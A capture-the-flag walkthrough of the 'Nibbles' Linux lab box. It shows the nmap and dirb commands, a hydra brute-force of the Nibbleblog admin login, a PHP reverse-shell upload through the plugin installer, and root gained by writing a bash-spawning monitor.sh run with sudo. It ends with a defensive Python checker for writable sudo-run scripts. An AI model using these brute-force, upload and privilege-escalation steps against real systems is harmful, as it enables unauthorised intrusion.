Summary

Nibbles is an easy Linux box that can be exploited by brute-forcing the administrator's login page. After this, a file upload vulnerability lets you install a malicious plugin. Privileges can be escalated by replacing a monitoring script that can be run with sudo rights.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.25.188

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The first thing I checked was the webserver. The user is presented with a blank page that only displays Hello world!. Viewing the page source (Ctrl + U) reveals the following comment:

/nibbleblog/ directory. Nothing interesting here!

Naturally, you can navigate to: http://10.129.25.188/nibbleblog/.

Next, as usual, the website was brute-forced for hidden files and directories with dirb:

dirb http://10.129.25.188/nibbleblog/ -X .php

The results were as follows:

+ http://10.129.25.188/nibbleblog/admin.php (CODE:200|SIZE:1401)   

Brute-Forcing the Login Page

Navigating there results in a login page. This can be brute-forced with hydra like this:

hydra -l admin -P /usr/share/wordlist/rockyou.txt -vV -f -t 2 10.129.25.188 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error"


[ATTEMPT] target 10.129.25.188 - login "admin" - pass "password" - 1 of 10000 [child 0] (0/0)
[ATTEMPT] target 10.129.25.188 - login "admin" - pass "123456" - 2 of 10000 [child 1] (0/0)

Hydra reports two candidates, but both are false positives: the application probably returns a different error message for these passwords on purpose, so the `login_error` failure string is not matched. By simply guessing you will get in with admin / nibbles. You are then presented with a standard dashboard.


Exploitation

A Google search turned up the following:

Nibbleblog contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 4.0.3.

Go to plugins > install and you will be able to upload a picture. The upload is not validated, so you can simply upload a PHP reverse shell instead. After clicking save changes it will display some warnings. You can ignore these and continue to http://10.129.25.190/nibbleblog/content/private/plugins/about/. It lists the PHP file you just uploaded, and clicking it opens a reverse shell as the user nibbler. The user.txt is in the home directory of this user.


Privilege Escalation

The next step is privilege escalation. I recommend running linpeas, which gives a great deal of information, such as:

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

I simply created this file:

$ cat monitor.sh
#!/bin/bash
/bin/bash

echo "worked"

By executing sudo /home/nibbler/personal/stuff/monitor.sh you obtain a root shell and can read root.txt.
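A defender-side check for the same misconfiguration, added here as an example and not part of the original writeup or of linpeas: it parses `sudo -l` output like the finding above and flags root-run commands whose script, or the directory the script lives in, the user can write to (a missing script in a user-owned directory is exactly this box). The uid 1001, the second rule and the file metadata are constructed; on a live host `lookup` would wrap `os.stat()`.

```python
import os
import re
import stat
from collections import namedtuple

FileInfo = namedtuple("FileInfo", "exists uid mode")  # mode = permission bits, e.g. 0o755
# One rule line of `sudo -l` output, e.g. "(root) NOPASSWD: /path/cmd"
RULE_RE = re.compile(r"\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S+)")

def parse_rules(sudo_l_output):
    """Return (runas, nopasswd, command) for each rule line."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.search(line.strip())
        if m:
            rules.append((m["runas"], "NOPASSWD" in m["tags"], m["cmd"]))
    return rules

def writable_by(info, uid):
    """Owner with the write bit set, or world-writable (group bits ignored for brevity)."""
    return (info.uid == uid and bool(info.mode & stat.S_IWUSR)) or bool(info.mode & stat.S_IWOTH)

def tamperable(rules, uid, lookup):
    """Root-run commands this uid could replace: the file is writable, or its directory is
    (a missing script can be created, an existing one deleted and recreated).
    lookup(path) -> FileInfo: wrap os.stat() on a live host, or supply test data as below."""
    hits = []
    for runas, _nopasswd, cmd in rules:
        if runas not in ("root", "ALL") or not cmd.startswith("/"):
            continue
        f, d = lookup(cmd), lookup(os.path.dirname(cmd))
        if (f.exists and writable_by(f, uid)) or (d.exists and writable_by(d, uid)):
            hits.append(cmd)
    return hits

# Constructed data: the rule from the writeup's linpeas output, plus an assumed harmless
# root-owned script for contrast; 1001 is an assumed uid for the nibbler user.
SUDO_L = """User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    (root) NOPASSWD: /usr/local/bin/check-disk.sh"""
NIBBLER_UID = 1001
FAKE_FS = {
    "/home/nibbler/personal/stuff": FileInfo(True, NIBBLER_UID, 0o755),  # user-owned directory
    "/home/nibbler/personal/stuff/monitor.sh": FileInfo(False, 0, 0),   # script not yet created
    "/usr/local/bin": FileInfo(True, 0, 0o755),
    "/usr/local/bin/check-disk.sh": FileInfo(True, 0, 0o755),
}

def audit_demo():
    return tamperable(parse_rules(SUDO_L), NIBBLER_UID, lambda p: FAKE_FS.get(p, FileInfo(False, 0, 0)))
```

Only the monitor.sh rule is flagged: the script itself does not exist, but its parent directory is owned and writable by nibbler, which is all that is needed to plant one.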